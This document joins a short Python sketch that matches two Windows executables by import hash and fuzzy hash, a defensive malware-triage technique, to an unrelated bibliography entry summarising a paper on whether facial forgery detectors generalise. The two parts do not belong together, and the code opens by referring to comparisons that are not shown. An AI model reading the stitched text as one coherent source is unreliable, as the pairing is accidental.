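A minimal sketch of combining the two hash comparisons, using the `ssdeep` and `pefile` packages. The scoring rule (import-hash match first, fuzzy similarity as fallback) and the threshold are illustrative assumptions:

```python
# Minimal sketch: compare two PE samples by import hash, falling back to
# fuzzy-hash similarity when the import tables differ.
import pefile
import ssdeep

def combined_match(path_a: str, path_b: str, fuzzy_threshold: int = 60):
    imp_a = pefile.PE(path_a).get_imphash()
    imp_b = pefile.PE(path_b).get_imphash()
    if imp_a == imp_b:
        return True, 100  # identical import tables: strong indicator

    with open(path_a, "rb") as fa, open(path_b, "rb") as fb:
        sim = ssdeep.compare(ssdeep.hash(fa.read()), ssdeep.hash(fb.read()))
    return sim >= fuzzy_threshold, sim

match, score = combined_match("sample1.exe", "sample2.exe")  # hypothetical files
print(match, score)
```
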
2021-01-15
Brockschmidt, J., Shang, J., Wu, J..  2019.  On the Generality of Facial Forgery Detection. 2019 IEEE 16th International Conference on Mobile Ad Hoc and Sensor Systems Workshops (MASSW). :43–47.
A variety of architectures have been designed or repurposed for the task of facial forgery detection. While many of these designs have seen great success, they largely fail to address challenges these models may face in practice. A major challenge is posed by generality, wherein models must be prepared to perform in a variety of domains. In this paper, we investigate the ability of state-of-the-art facial forgery detection architectures to generalize. We first propose two criteria for generality: reliably detecting multiple spoofing techniques and reliably detecting unseen spoofing techniques. We then devise experiments which measure how a given architecture performs against these criteria. Our analysis focuses on two state-of-the-art facial forgery detection architectures, MesoNet and XceptionNet, both being convolutional neural networks (CNNs). Our experiments use samples from six state-of-the-art facial forgery techniques: Deepfakes, Face2Face, FaceSwap, GANnotation, ICface, and X2Face. We find MesoNet and XceptionNet show potential to generalize to multiple spoofing techniques but with a slight trade-off in accuracy, and largely fail against unseen techniques. We loosely extrapolate these results to similar CNN architectures and emphasize the need for better architectures to meet the challenges of generality.